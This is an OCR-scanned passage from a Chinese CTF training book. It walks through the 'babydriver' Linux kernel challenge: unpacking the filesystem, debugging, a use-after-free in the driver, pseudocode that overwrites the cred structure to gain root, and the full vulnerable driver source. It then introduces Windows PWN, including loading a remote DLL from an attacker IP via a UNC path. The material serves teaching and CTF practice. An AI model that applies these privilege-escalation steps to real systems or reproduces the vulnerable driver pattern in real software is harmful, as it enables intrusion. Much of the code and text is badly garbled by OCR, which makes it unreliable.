除了 网 络 ， 还 有 什么 办 法 进行 文件 传输 呢 其 实 也 可 以 通过 重新 打包 文件 系统 的 方式 。 本 例 中 ，cpio 
是 文件 系统 ， 并 且 使 用 gzip 压 缩 格 式 进行 压缩 ， 可 以 通过 以 下 命令 解压 : 


mv rootfs.cpio roots.cpio.gz; gzip -d rootfs.cpio.gz 


得 到 的 文件 再 通过 cpio 命 令 解 压 到 path 目 录 下 : 


mkdir path; cd path; cpio -idmv < ./rootfs.cpio 


然后 可 以 在 path 目 录 下 获取 该 题目 中 的 所 有 文件 ， 还 可 以 把 Exp 放 到 该 目录 下 ， 然 后 执行 : 


进行 重 打包 压缩 。 这 样 束 可 以 通过 修改 文件 系统 的 方式 与 题目 环境 进行 文件 传输 。 


6.7.4 切 始 化 脚本 
在 文件 系统 中 ， 根 目录 下 的 init 文 件 一 般 为 系统 的 启动 脚本 。 例 如 : 


#!/bin/sh 


mount -t proc none /proc 
mount -t sysfs none /sys 
mount -t devtmpfs devtmpfs /dev 


insmod /lib/modules/4.4.72/babydriver.ko 

chmod 777 /dev/babydev 

echo -e "\nBoot took $(cut -d' ' -fl /proc/uptime) seconds\n" 
setsid cttyhack setuidgid 1000 sh 


umount /proc 
mount /sys 
powero I el I 


可 以 得 到 如 下 信息 : 


全 
2 


该 题目 是 让 攻击 者 攻击 babydriver.ko 驱 动 ， 所 以 下 一 步 是 对 该 文件 进行 逆向 分 析 。 


该 
启动 内 核 后 ， 只 有 普通 用 户 的 权限 ， 因 为 在 init 脚 本 中 执行 了 “setsid cttyhack 


setuidgi 
1000 sh” 人 命令， 注释 该 行 ， 束 能 有 root 权 限 了 。 
注意 ， 在 本 地 测试 环境 中 有 root 权 限 是 没 用 的 ， 一 般 题目 的 远程 服务 器 提供 普通 用 户 权 限 ， 本 地 测试 
成 功 后 的 Exp 上 传 ， 获 得 root 权 限 后 ， 从 该 远程 服务 器 就 能 获取 flag 了 。 


6.7.5 内 核 调试 


pS LAN/N me = CID :0 yd ND 0 0 “-s ”参数 ， 
会 启动 一 个 gdbserver， 监 听 本 地 的 1234 端 口 以 供 内 核 调试 器 调试 。 另 外 ， 可 以 通过 bzlmage 获 取 
V 

(内 核 二 进 制 文件 ) ， 供 GDB 进 行 调 试 。 


一 般 内 核 的 题目 会 去 掉 调 试 符号 ， 本 题 也 不 例外 。 对 于 这 种 驱动 的 题目 ， 只 要 换 种 思路 ， 就 能 进行 带 
符号 的 逆向 、 调 试 。 一 般 只 要 内 核 版 本 不 太 低 ， 就 可 以 下 载 到 一 个 相同 版 本 的 Ubuntu 内 核 。 人 
://ddebs.ubuntu.com/ 可 以 获取 对 应 版 本 有 符号 的 vmLinux， 然 后 蔡 换 题目 的 bzlmage,， 就 可 以 
利用 有 符号 的 内 核 比 较 轻 松 地 进行 逆向 、 调 试 工 作 了 。 


另外 ， 在 新 版 的 内 核 中 ， 实 际 的 地 址 与 内 核 ELF 中 的 地 址 会 有 偏差 ， 这 可 能 导致 GDB 的 符号 识别 失 
败 ， 可 以 通过 修改 Qemu 的 启动 参数 ， 在 内 核 启动 参数 中 增加 “nokaslr”， 和 避免 地 址 偏 移 带 来 的 问 
题 。 完 整 的 启动 参数 为 : 
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"consoLe=ttyS0 root=/dev/ram oops=panic panic=1 nokaslr' 


这 样 内 核 启 动 时 ， 实 际 的 地 址 与 二 进 制 中 的 地 址 就 一 致 了 。 


但 是 对 于 没 办 法 获得 符号 的 内 核 ， 该 怎样 设置 断 点 呢 ? 可 以 在 内 核 启动 后 ， 通过 /proq 
QIISVIMm 
”获取 相应 符号 地 址 : 


# cat /proc/kallsyms |grep baby 
ffffffffcO000000 t babyrelease [babydriver] 
ffffffffc99924d9 b babydev_struct [babydriver] 
ffffffffc9999036 t babyopen [babydriver] 
ffffffffc90090896 t babyioctl [babydriver] 
ffffffffc90000f9 七 babywrite [babydriver] 
ffffffffc9909136 t babyread [babydriver] 
ffffffffc9902446 b babydev_no [babydriver] 


6.7.6 分 析 程 序 


前 面 的 准备 工作 结束 后 ， 接 下 来 进入 正题 。 很 多 人 认为 攻击 内 核准 ， 有 可 能 党 得 分 析 内 核 的 二 进 制 
难 。 正 常情 况 下 ， 因 为 比赛 的 时 间 有 限 ， 基 本 不 可 能 完全 逆向 整个 内 核 ， 所 以 主要 工作 是 找 出 驱动 类 
型 的 漏洞 。 如 本 题目 一 样 ， 在 init 脚 本 中 通过 insmod 动 态 加 载 了 一 个 自 定义 驱动 ， 这 样 容易 想到 漏洞 
应 该 在 这 个 驱动 当中 。 在 现实 的 内 核 漏洞 挖掘 中 则 可 以 查看 源 代 码 ， 逆 向 分 析 的 难度 自然 下 降 了 。 


本 题 是 从 文件 系统 中 找到 babydriver.ko 驱 动 ， 然 后 利用 IDAi 进 行 逆 向 分 析 。 其 代码 量 不 大 ， 漏 洞 很 
好 友 现 。 


int babyopen(struct inode *inode，struct file *filp) { 
babydev_struct.buf = kmem_cache_alloc_trace(kmalloc_caches[6], 37748928, 64); 
babydev_struct.Len = 64; 
printk("device open\n"); 
return 0; 


} 


每 次 在 用 户 层 执行 “open (/dev/babydev) ”命令 时 ， 都 会 调用 内 核 态 的 babyopen 函 数 。 而 该 
函数 的 每 次 调用 都 会 给 同一 个 babydev_struct 变 量 进行 赋值 。 但 是 如 果 打 开 两 次 该 设备 ， 然 后 释放 其 
中 一 个 文件 指针 ， 另 一 个 文件 指针 中 的 babydev struct.buf 指 针 却 没有 被 置 0， 且 该 指针 仍然 可 以 被 
使 用 ， 就 产生 了 UAF 漏 洞 。 


触发 该 漏洞 的 伪 代 码 为 : 


fl1 = open("/dev/babydev", 2) 
f2 = open("/dev/babydev", 2) 
close(f1); 


6.7.7 淹 油 利用 


在 用 户 态 二 进 制 PWN 中 ， 最 终 目 标 为 通过 执行 System 或 者 execve 启 动 shell。 但 是 在 内 核 PWN 中 ， 
最 终 的 目标 是 提 权 。 那 么 ， 该 如 何 提 权 呢 ? 这 需要 对 Linux 内 核 的 相关 机 制 有 一 定 的 了 解 。 旧版 的 
IN 

内 核 中 有 一 个 thread info 结 构 体 : 


struct thread_info { 
/* main task structure */ 
/* low level flags */ 
/* thread synchronous flags */ 
/* current CPU */ 
mm_segment_t addr_limit; 
unsigned int sig_on_uaccess_error:1; 
unsigned int uaccess_err:1; 


struct task_struct { 


* objective and real s ective task credentials (COW) */ 
eal_cred; 
subjective task credentials (COW) */ 


而 cred 结 构 体 是 用 来 保存 权限 相关 的 信息 : 


struct cred { 


一 0 
#ifdef A 
ribers; 


void *put. pe 
ee De a 
rafin 人 vU272KSKAIL 
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#define CRED_MAGIC_DEAD 6xuu4656144 
#endif 
kuid_t uid; // real UID of the task 
kgid_t gid; // real GID of the task 
kuid_t suid; // saved UID of the task 
kgid_t sgid; // saved GID of the task 
kuid_t euid; // effective UID of the task 
kgid_t egid; // effective GID of the task 
kuid_t fsuid; // UID for VFS ops 
kgid_t fsgid; // GID for VFS ops 
signed securebits; // SUID-less security management 
el_cap_t cap_inheritable; // caps our children can inherit 
nel_cap_t cap_permitted; caps we're permitted 
cap_effective; caps we can actually use 
nel_cap_t cap_bset; capability bounding set 
L_cap_t cap_ambient; // Ambient capability set 
#ifdef CONFIG_KEYS 
unsigned char jit_keyring; // default keyring to attach requested keys to 
struct key __Fcu *session_keyring; // keyring inherited over fork 
struct key *process_keyring; // keyring private to this process 
struct key *thread_keyring; // keyring private to this thread 
struct key *request_key_auth; // assumed request_key authority 
#endif 
#ifdef CONFIG_SECURITY 
V // subjective LSM security 


User_namespace *us s er_ns the caps and keyrings are relative to 


er_ns; 
struct group_info *group_info; supplementary groups for euid/fsgid 
struct rcu_head rceu; // RCU deletion hook 
ys 


内 核 获取 到 thread_info 地 址 的 代码 : 


#ifdef CONFIG_KASAN 

#define KASAN_STACK_ORDER 1 
#else 

#define KASAN_STACK_ORDER 09 
#endif 


#define PAGE_SHIFT 12 
#define PAGE_SIZE (AC(1, UL) << PAGE_SHIFT) 


// x86_64 
#define THREAD_SIZE (PAGE_SIZE << THREAD_SIZE_ORDER) 


static inline struct thread_info *current_thread_info(void) { 
return (struct thread_info *)(current_top_of_stack() - THREAD_SIZE); 
} 


所 以 在 旧版 的 内 核 中 ， 一 个 进程 进入 内 核 态 以 后 ， 在 当前 栈 顶 地 址 偏 移 为 0x4000 或 0x8000 (由 编译 
内 核 时 的 配置 决定 ) 的 位 置 ， 可 以 获取 thread info 地 址 ， 从 而 得 到 task struct 的 地 址 ， 和合 < 
地 址 ， 该 结构 体 中 保存 着 当前 进程 的 权限 信息 。 读 者 可 以 使 用 GDB 调 试 ， 跟 随 上 述 流程 ， 氨 二 到 
结构 体 的 地 址 ， 看 看 其 中 的 权限 信息 是 否 与 当前 进程 的 权限 信息 一 致 。 但 是 在 新 版 的 内 核 中 ， 该 结 
构 友 生 了 变化 ， 一 个 全 局 链表 中 存储 着 task_struct 信 息 ， 内 核 先 获取 到 当前 进程 的 task_struct 地 址 ， 
再 在 该 结构 体 中 存储 着 thread_info 和 cred 结 构 体 的 地 址 ， 但 cred 结 构 体 存 储 在 task_struct 中 这 一 点 
并 没有 发 生变 化 。 


cred 结 构 体 存储 当前 进程 的 权限 信息 ， 所 以 在 内 核 PWN 中 ， 最 终 目 标 是 修改 cred 结 构 体 。 那 么 ， 应 
该 如 何 利用 本 题 的 漏洞 来 修改 当前 进程 的 cred 呢 ? 本题 有 一 个 比较 简单 的 方法 ， 因 为 cred 结 构 体 的 大 
小 是 0xa8， 当 创建 一 个 新 进程 时 ， 内 核 会 在 堆 中 申请 0xa8 长 度 的 堆 人 存放 cred 绪 构 体 。 所 以 利用 思路 
如 下 : 申请 一 个 0xa8 字 节 的 堆 (babyioctl 可 以 实现 ) ， 赋 值 给 babydev struct.buf， 再 释放 ， 然 后 
创建 一 个 新 进程 ， 这 样 释放 的 0xa8 大 小 的 堆 会 分 配给 新 进程 的 cred 结 构 体 ; 因为 存在 UAF 漏 洞 ， 所 以 
cred 结 构 体 的 内 容 是 可 控 的 ， 只 要 把 控制 权限 的 字段 修改 为 0 (root 的 UID) ， 这 样 创建 的 新 进程 歹 
能 获取 root 权 限 ， 达 到 提 权 的 目的 。 伪 代码 如 下 : 


fdl = open("/dev/babydev", 2); 
fd2 = open("/dev/babydev", 2); 
ioctl(fd1l, Ox10001, Qxa8); 
close(fd1); 


pid = fork(); 

if pid == 0: 
write(fd2, QO*24, 24); 
system("/bin/sh"); 


上 述 利用 方式 只 适用 于 类 似 本 题 这 样 低 版 本 的 内 核 ， 因 为 新 版 的 内 核对 此 已 经 进行 了 修补 。 在 内 核 
中 ， 堆 分 配 依赖 kmem_cache 结 构 体 。kmalloc 通 过 传 入 的 size 大 小 在 kmalloc_caches 中 寻找 合适 的 
kmem_cache 绪 构 体 。 而 cred 有 一 个 专门 的 kmem_cache 绪 构 体 全 局 变量 cred_ jar， 在 内 核 司 动 时 初 
始 化 : 


void __init cred_init(void) { 
// allocate a slab in which we can store credentials 
cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 9, 
SLAB_HWCACHE_ALIGN | SLAB_PANIC|SLAB_ACCOUNT, NULL); 


在 旧版 本 中 初始 化 cred jar 的 Flag 与 kmalloc_ caches 初 始 化 的 一 致 ， 这 导致 “cred jar==kmalloc 


aches 
[2]”， 所 以 驱动 中 调用 kmalloc 分 配 了 0xa8 大 小 的 堆 ， 然 后 释放 ， 该 内 存 会 被 重新 分 配给 
人 RS 
。 因 为 它们 的 kmem_cache 一 样 ， 新 版 本 中 ，cred jar 创 建 的 flag 与 kmalloc_caches[2] 创 建 的 不 一 
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样 ， 该 题 的 利用 方法 无 法 用 于 新 版 内 核 。 想 更 深入 了 解 细节 的 读者 可 以 自行 研读 Linux 内 核 源 码 ， 对 
比 新 旧 唉 本 。 


6.7.8 PWN Linux 人 小 结 


俗话 襄 ， 万 事 开 头 难 ， 只 要 一 只 脚 跨 入 Linux 内 核 的 大 []， 从 头 到 尾 了 解 内 核 题目 的 整个 攻击 流程 ， 
接 下 来 要 做 的 融 是 知识 的 积累 ， 去 学 习 Linux 内 核 的 各 种 利用 方式 。 内 核 有 许多 保护 机 制 ， 根 据 不 同 
的 环境 ， 也 有 不 同 的 利用 方式 。 这 些 需要 参赛 者 长 期 的 知识 积累 。CTF 中 PWN 题 目 漏洞 的 利用 思路 包 
括 : 根据 以 前 遇 到 类 似 的 题目 ,根据 以 往 的 经 验 来 做 题 ， 通 过 基础 知识 的 熟练 程度 和 个 人 的 “ 灵 
进行 利用 思路 的 创新 。 


第 一 种 可 以 想 和 象 成 题 海战 术 ， 大 量 做 以 前 CTF 中 出 现 的 内 核 PWN 题 。 对 于 想 不 出 利用 思路 的 题目 ， 可 
以 参考 其 他 人 的 writeup 的 利用 思路 ， 然 后 对 题目 进行 总 结 。 第 二 种 则 需要 扎实 的 基本 功 ， 需要 对 
inux 


内 核 源 码 有 一 定 的 了 解 ， 遇 到 问题 先 使 用 搜索 引擎 来 解决 ， 如 果 无 法 解决 ， 则 去 读 源 码 。 再 结合 
身长 时 间 的 思考 和 经 验 想 出 一 种 新 的 利用 思路 。 这 种 方式 更 像 实 际 内 核 漏洞 的 挖掘 思 


6.7.9 Linux 内 核 PWN 源 代 但 


babydriver.c 

#include <Linux/init.h> 
#include <Linux/module.h> 
#include <linux/slab.h> 
#include <linux/cdev.h> 
#include <asm/uaccess.h> 
#include <Linux/types.h> 
#include <linux/fs.h> 


MODULE_LICENSE("Dual BSD/GPL"); 
MODULE_AUTHOR(C"xxxx"); 


struct babydevice t { 
char *buf; 
long len; 

}; 


struct babydevice_t babydev_struct; 
static struct class *buttons_cls; 
dev_t babydevn; 

struct cdev babycdev; 


ssize_t babyread(struct file *filp, char __user *buf, size_t count, loff_t xf_pos) { 
int result; 
if (!babydev_struct .buf) 
return -1; 
result = -2; 
if (babydev_struct.len > count) { 
raW_copy_to_user(buf, babydev_struct.buf, count); 
result = count; 
} 


return result; 


ssize_t babywrite(struct file «filp, const char __user *buf, size_t count, loff_t *f_pos) { 
int result; 
if (!babydev etret: buf) 
return ~ 
result 
if i ee len > count) { 
rom_user(babydev_struct .buf, buf, count); 


static Long babyioctl(struct files filp , unsigned int cad , unsigned long arg) { 
int result; 
if (cmd == 65537) { 
kfree(babydev_struct .buf); 
babydev_struct,buf = kmalloc(arg, GFP_KERNEL); 
babydev_struct ,len = arg; 
printk("alloc done\n"); 
result = 0; 
} 
else { 
printk(KERN_ERR "default:arg is %ld\n", arg); 
result = -22; 
} 
return result; 
} 
int babyopen(struct inode winode, struct file wfilp) { 
babydev_struct.buf = kmem_cache_alloc_trace(knalloc_caches[6], 37748928, 64); 
babydev_struct, len = 64 
printk("device open\n"); 
return 0; 


int babyrelease(struct inode winode, struct file wfilp) { 
kfree(babydev_struct .buf); 
printk("device release\n"); 
return 9; 

} 

struct file_operations babyfops = { 
-owner = THIS_MODULE, 
.read = babyread, 
-Write = babywrite 
-unlocked_ioctl = Ca ctl, 
.Open = bal 
.release Rs ase, 

}; 


int babydriver_init(void) { 
int resu @rr; 
struct Bs Wi 


result = alloc_chrdev_region(&babydevn, ©, 1, "babydev"); 
if (result >= 6) { 
cdev_init(&babycdev, &babyfops); 
babycdev .owner = THIS_MODULE; 
err = cdev_add(&babycdev, babydevn, 1); 
if (err >= 0) { 
buttons_cls = class_create(THIS_MODULE, "babydev"); 
if (buttons_cls) { 
i = device_create(buttons_cls, 0, babydevn, 9, "babydev"); 
1f (4) 
return 0; 
printk(KERN_ERR "create device failed\n"); 
class_destroy(buttons_cls); 
} 
else { 
printk(KERN_ERR "create class failed\n"); 
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cdev_del(&babycdev); 


else { 
printk(KERN_ERR "cdev init failed\n"); 


1 
unregister_chrdev_region(babydevn, 1); 
return result; 


人 
printk(KERN_ERR "alloc_chrdev_region failed\n"); 
return 0; 


} 


void babydriver_ exit(void) { 
device_destroy(buttons_cls, babydevn); 
class_destroy(buttons_cls); 
cdev_del(&babycdev); 
unregister_chrdev_region(babydevn, 1); 
} 


module_init(babydriver_init); 
module_exit(babydriver_exit); 
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6.8 Windows 系 统 的 PWN 


相 比 于 Linux，Windows 更 庞大 和 复杂 ， 在 默认 配置 下 包含 更 多 的 组 件 。 由 于 其 中 闭 源 组 件 占 了 绝 大 
多 数 ， 再 加 上 复杂 的 权限 管理 和 不 同 的 内 核实 现 ， 使 得 Windows 环 境 的 PWN 题 目 在 CTF 中 人 鲜 有 出 
现 ， 不 过 随 着 CTF 队 伍 整 体 实 力 的 逐渐 增强 ，Windows 下 的 PWN 题 目 也 逐渐 受到 选手 们 的 重视 。 本 
节 以 Linux 与 Windows 的 差别 为 重点 ， 着 重 介绍 Windows 的 PWN 技 巧 。 


6.8.1 Windows 的 权限 管理 


Windows 默 认 的 权限 管理 比 Linux 更 复杂 。 传统 的 Linux 权 限 管 理 是 根据 owner、group 及 其 access 
mask 来 控制 的 。 通 常用 户 只 需要 chown、chgrp、chmod 这 三 个 命令 即 可 完成 对 Linux 下 文件 的 权限 
的 所 有 修改 。 在 Windows 下 ， 每 个 用 尸 的 标识 被 称 为 SID， 而 对 象 ( 文 件 、 设 备 、 内 存 区 等 ) 的 权限 
管理 由 安全 描述 符 (Security Descriptor，SD) 控制 。 安 全 摘 述 符 中 包含 owner、group 的 SID、 

ACL 和 System ACL。ACL (Access Control List， 访 问 控制 表 ) 是 用 来 控制 对 象 访问 权 
限 的 列表 ， 其 中 包含 多 个 ACE (Access Control Entry， 访 问 控制 实体 ) 。 每 个 ACE 摘 述 了 一 个 用 户 
对 于 当前 对 象 的 权限 。 


人 在 Windows 中 ， 用 户 可 以 通过 icacls 命 令 修改 一 个 对 象 的 ACL。 icacls 采 用 微软 制定 的 SDDL 
ecuri 
Descriptor Definition Language， 安 全 描述 符 定 义 语言 ) 详细 摘 述 一 个 安全 摘 述 符 中 包含 的 信 


通过 icacls 查 看 文件 权限 : 


C:\Users\bitma>icacls test.txt 

test.txt NT AUTHORITY\SYSTEM: (F) 
BUILTIN\Administrators:(F) 
DESKTOP-JQF8ABP\bitma: (F) 

已 成 功 处 理 1 个 文件 ; 处 理 9 个 文件 时 失败 


可 以 看 到 ，SYSTEM、Administrators、bitma 这 三 个 SID 对 test.txt 有 完全 访问 权限 。 现 在 尝试 删除 
对 于 test.txt 的 访问 权限 : 


C:\Users\bitma>icacls test.txt /inheritance:d 
已 处 理 的 文件 : test .txt 

已 成 功 处 理 1 个 文件 ; 处 理 8 个 文件 时 失败 
C:\Users\bitma>icacls test.txt /remove bitma 
已 处 理 的 文件 : 上 test .七 Xt 

已 成 功 处 理 1 个 文件 ; 处 理 8 个 文件 时 失败 
C:\Users\bitma>icacls test .txt 

test .txt NT AUTHORITYNSYSTEM: (F) 


BUILTINNAdministrators:(F) 
已 成 功 处 理 1 个 文件 ; 处 理 6 个 文件 时 失败 


注意 ， 在 修改 一 个 文件 的 ACL 时 ， 若 修改 的 ACE 项 是 继承 的 ， 要 先 关 闭 其 继承 属性 。 ACL 的 继承 是 ， 
| 
特有 的 一 种 机 制 ， 若 一 个 文件 局 用 了 ACL 继 承 ， 则 其 ACL 会 继承 其 父 对 象 (本 例 中 为 test.txth 
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6.8.2 Windows 的 调用 约定 


32 位 Windows 通 第 采 用 _stdcall 调 用 约定 ， 参 数 按 从 右 到 左 的 顺序 被 逐一 压 入 栈 中 ， 并 且 在 调用 完 
成 后 ， 由 被 调用 函数 清理 这 些 参数 ， 卫 数 的 返回 值 会 放 在 EAX 中 。 


64 位 Windows 通 常 采用 微软 的 x64 调 用 约定 ， 其 中 前 4 个 参数 会 被 分 别 放 入 RCX、RDX、R8、R9 
中 ， 更 多 的 参数 会 存在 栈 上 ， 返 回 值 放 在 RAX 中 。 在 这 个 调用 约定 下 ,，RAX、RCX、RDX、R8、R 
9、R10、R11 由 调用 方 保存 ，RBX、RBP、RDI、RSI、RSP、R12、R13、R14、R15 由 被 调用 方 保 
存 。 


6.8.3 Windows 的 漏洞 缓解 机 制 


为 了 解决 PWN 题 目 ,漏洞 缓解 机 制 是 CTF 参 赛 者 需要 的 悉 的 东西 。 本 世人 简单 介绍 常见 的 Windows 泌 
洞 缓解 措施 。 由 于 某 些 漏洞 缓解 机 制 是 编译 器 相关 的 ， 因 此 本 节 使 用 的 编译 器 是 MSVC ee 
网 攻 


1. Stack Cookie 


Windows 也 有 Stack Cookie 机 制 来 缓解 栈 浇 出 攻击 。 不 过 与 Linux 不 同 的 是 ，Windows 的 Stack 


但 ele 


有 不 同 的 实现 。 例 如 : 


#include <cstdio> 
#include <cstdlib> 


int main(int argc, char* argv[]) { 
char name[100]; 


printf("Name?: "); 
scanf("%s", name); 
printf("Hello, %s\n", name); 
return 0; 


过 编译 器 编译 后 生成 的 汇编 见 图 6-8-1。 


8881409913C9 ;3 int _ cdecl main(int argc，char xxargu) 
8881488013C8 main proc near ; CODE XREF: j_mainTj 
8661400013C0 ; DATA XREF: -pdata:EXceptionDiryo 
8881400013C0 
B881400013C0 var 88 = byte ptr -88h 
89691499913C9 var 18 = qword ptr -18h 
6961400013C0 arg 6 = dword ptr 8 
= qword ptr 18h 


886140909013C5 mov [rsp+arg 8], rdx 
B88614090013C5 mov [rspt+arg_8], ecx 
sub rsp, 8A8h 
mov rax, C5: security cookie 
xor rax, rsp 
movu [rsp+8A8h+vuar_ 18], rax 
lea rex, _Format ; "Name?: " 
call j _printf 
lea rdx, [rsp*+8A8h+rvuar_ 88] 
lea rcx, as ; "%5' 
call j_scanf 
lea rdx, [rsp+8A8h+var 88] 
lea rex, aHellos ; "Hello, %s\n"’ 
call j_printf 
68989140001410 XOF eax, eax 
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6866146001412 mov rcx, [rsp+8A8h+var 18] 
XOF rex, rsp ; StackCookie 
call ] security check cookie 
add rsp, BA8h 
retn 
endp 
888140001429 


图 6-8-1 
可 以 看 到 ， ”security cookie 就 是 Windows 的 Stack Cookie。 注 意 ， 程 序 在 将 Stack Cookie 放 入 栈 
中 前 ， 程 序 还 将 其 与 RSP 进 行 了 异 或 操作 ， 这 在 某 种 程度 上 增强 了 保护 程度 ， 攻 击 者 需要 同时 知道 当 
前 栈 顶 地 址 和 Stack Cookie 才 能 够 进行 栈 溢出 漏洞 的 利用 。 


2. DEP 


DEP (Data Execution Prevention， 数 据 执 行 保护 ) 与 Linux 下 的 保护 机 制 NX 类 似 ， 将 数据 区 域 的 
内 存 保护 属性 置 为 可 读 写 不 可 执行 。 这 两 个 机 制 都 是 为 了 防止 攻击 者 利用 数据 区 域 放 置 恶 意 代码 ， 
而 达到 任意 代码 执行 。 


3. CFG 


CFG (Control Flow Guard,， 控制 流 保护 ) 是 Windows 支 持 的 一 种 比较 新 的 保护 机 制 。 被 保护 的 间 
接 调 用 的 结果 见 图 6-8-2。 每 次 进行 间接 调用 前 都 会 由 _guard_dispatch _icall fptr 冰 数 对 函数 据 针 进 
行 检 查 。 在 函数 指针 被 修改 到 非法 的 地 址 的 情况 下 ， 程 序 会 被 异 尝 终止 。 


8000140801AE _ cdecl main(int argc, char x*xargu) 

0886001409061AEQ 5 main proc near ; CODE XREF: j main1Tj 
96091496861AE0 ; DATA XREF: .pdata:0008008 
BBBB1D69B1AE 

BOO0140001ANEG uar 18 = gword ptr -18h 

880068146001AEQ arg 8 = dword ptr 8 

a6686140661AE6 arg 8 = gword ptr 18h 

80081408861AE0 

8806140881AE0 mov [rsp+arg 8], rdx 

a60814a00iAES mov [rsp+arg_8], ecx 

B000400801AE9 sub rsp, 38h 

a600140001AED mou rax, Cs:?f@a3P6AXNPEBDGZEA ; void (xf) (char 
B11AF mov [rsp+*38h+var 18], rax 

680686140861AF9 lea PFCX， al2d ; "123" 
8660640801B00 mov rax, [rsp+38h+uar 18] 

B800146001B05 call cs: guard dispatch icall fptr 
B908140801B 8B XOF 已 可 X ， Cax 

90086140881B 6D add rsp, 38h 

B60814008018B11 retn 

a668146001811 main endp 

B666146661B11 














4. SEHOP、SafeSEH 


psa/ le [oN A SE] me = se A YA /Tle [oN A :元 be 
于 栈 上 。 由 于 这 些 信息 中 包含 SEH Handler 的 地 址 ， 覆 盖 SEH 成 为 了 攻击 早期 windows 以 及 其 程序 的 


https://weread.qq.com/web/reader/77d32500721a485577d8eeekc0c320a0232c0c7c76d365a 3/5 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读书 


常用 利用 技巧 ， 因 此 微软 在 新 版 Windows 中 引入 了 SEHOP 和 SafeSEH 这 两 个 缓解 措 施 。SEHOP 会 检 
测 SEH 单 链表 的 末尾 是 不 是 指向 一 个 固定 的 SEH Handler， 否 则 异常 终止 程序 。SafeSEH 会 检测 当前 
使 用 的 SEH Handler 是 否 指向 当前 模块 的 一 个 有 效 地 址 ， 否 则 异常 终止 程序 。 


5. Heap Randomization 


Windows 的 堆 保 护 机 制 很 多 ， 其 中 最 令 人 印象 深刻 的 莫 过 于 LFH 的 随机 化 。 例 如 : 


#include <cstdio> 
#include <cstdlib> 
#include <Windows.h> 


#define HALLOC(x) (HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (x))) 


int main() { 
for(int i = 6; i < 20; i++) { 
printf("Alloc: %p\n", HALLOC(Qx30)); 


程序 结果 如 下 : 


F:\Test\random>heap .exe 
Alloc: 000002C58431EB18 
Alloc: O00002C58431F8AQ 
Alloc: O00002C58431FOEQ 
Alloc: 000002C58431F1298 
Alloc: O00002C58431EE20 
Alloc: O00002C58431F2E0 
Alloc: 00002C58431F1EQ 
Alloc: O00002C58431EF208 
Alloc: O00002C58431EF60 
Alloc: O00002C58431EBAG 
Alloc: O00002C58431F168 
Alloc: O00002C58431F1AQ 
Alloc: 000002C58431EC20 
Alloc: O00002C58431EFAG 
Alloc: 0008002C58431F220 
Alloc: O00002C58431F260 
Alloc: 000002C58431F2A9 
Alloc: O00002C58431ECAO 
Alloc: 000002C58431ED20 
Alloc: O00002C58431F068 


一 般 的 内 存 分 配器 对 于 连续 的 申请 会 返回 连续 的 地 址 ， 不 过 可 以 看 到 ， 分 配 到 的 地 址 并 不 是 连续 的 ， 
而 且 没 有 规律 可 言 。 人 在 LFH 开 局 的 情况 下 ， 堆 块 的 分 配 是 随机 的 ， 使 得 攻击 者 的 利用 更 困难 。 


6.8.4 Windows 的 PWN 近 巧 


1. 从 堆 上 泄露 栈 上 地 址 


通 芝 情况 下 ， 堆 上 是 不 会 存在 栈 上 地 址 的 ， 因 为 栈 上 的 内 容 一 般 比 堆 上 的 内 容 保存 的 时 间 更 短 。 不 if 
在 Windows 下 有 一 种 特殊 情况 ， 导 致 堆 上 内 容 中 人 存 有 栈 地 址 。 国 外 的 安全 研究 员 j00ru 友 现 ， 在 CR 
初始 化 的 过 程 中 ， 由 于 使 用 了 未 初始 化 内 存 ， 导 致 一 部 分 包含 栈 上 地 址 的 内 容 被 复制 到 了 堆 上 。 于 是 
束 可 以 从 堆 上 泄露 栈 地 址 ， 然 后 修改 栈 数 据 。 
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这 个 技巧 在 x86 和 x64 程 序 中 都 可 以 使 用 。 


2. LoadLibrary UNC 加 载 模块 


[eleTe 


由 于 一 般 的 Windows Pwnable 没 有 办 法 直接 执行 system 弹 shell， 因 此 需要 使 用 各 种 各 样 的 
和 【二 
来 完成 想 要 的 操作 ， 但 是 这 样 做 相当 麻烦 ， 在 测试 shellcode 的 时 候 可 能 遇 到 本 地 与 远程 环境 不 同等 
情况 。 如 果 能 够 调用 LoadLibrary， 工 作 量 就 能 大 大 减轻 。 


LoadLibrary 是 Windows 下 用 来 加 载 DLL 的 函数 ， 由 于 其 支持 UNC Path， 因此 可 以 铀 用 | 村 站 
oadLibra 
("\attacker ip\malicious.dll") ， 让 程序 加 载 远程 服务 器 上 攻击 者 提供 的 DLL， 从 而 达到 任意 
代码 执行 的 能 力 。 这 样 的 攻击 方式 相 比 于 执行 shellcode 更 稳定 。 


值得 一 提 的 是 ， 新 版 Windows 10 中 引入 了 Disable Remote Image Loading 机 制 ， 若 程序 运行 


开局 此 项 缓解 措施 ， 则 无 法 使 用 UNC Path 加 载 远程 DLL。 
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(eRe AVA/lele [eM psp N 


对 于 一 般 的 程序 员 而 言 ， 操 作 系 统 内 核 一 直 是 一 块 神秘 之 地 ， 因 为 绝 大 多 数 的 程序 开发 人 员 只 是 
使 用 操作 系统 内 核 提 供 的 各 种 功能 和 接口 ， 对 于 操作 系统 内 核 的 实现 细节 往往 只 知 其 然 ， 尤 其 对 于 不 
开放 源 代码 的 Windows 操 作 系 统 而 言 更 是 如 此 。 


核 运 行 于 CPU 的 高 特权 级 上 ， 连 Windows 操 作 系统 理论 上 的 最 高 权限 一 一 System 权限 都 无 法 与 之 匹 
政 。 如 果 我 们 擎 握 了 操作 内 核 级 别 的 权限 ， 融 可 以 在 系统 中 呼风唤雨 、 无 所 不 能 了 。 虽然 操 作 系统 内 
核 的 漏洞 比 起 应 用 层 应 用 程序 的 漏洞 来 说 挖掘 更 困难 ， 利 用 的 阻碍 更 多 ， 但 还 是 不 断 吸引 着 安全 研究 
人 员 投 入 其 中 。 


本 节 将 带领 读者 走 入 Windows 内 核 ， 探 索 其 漏洞 与 利用 技术 ， 从 Windows 内 核 及 系统 架构 的 基础 开 
始 快速 入 门 ， 再 逐步 了 解 内 核 利 用 技术 与 内 核 缓 解 措 施 ; 同时 ， 可 以 体会 到 微软 的 安全 技术 人 员 与 黑 
客 之 间 的 技术 较量 ， 让 读者 对 攻防 有 更 深入 的 认识 。 


6.9.1 天 于 Windows 操 作 系 统 


我 们 现在 使 用 的 Windows 操 作 系 统 的 底层 以 构 都 是 继承 目 Windows NT 4.0 版 本 。 实 际 上 ， Pe 

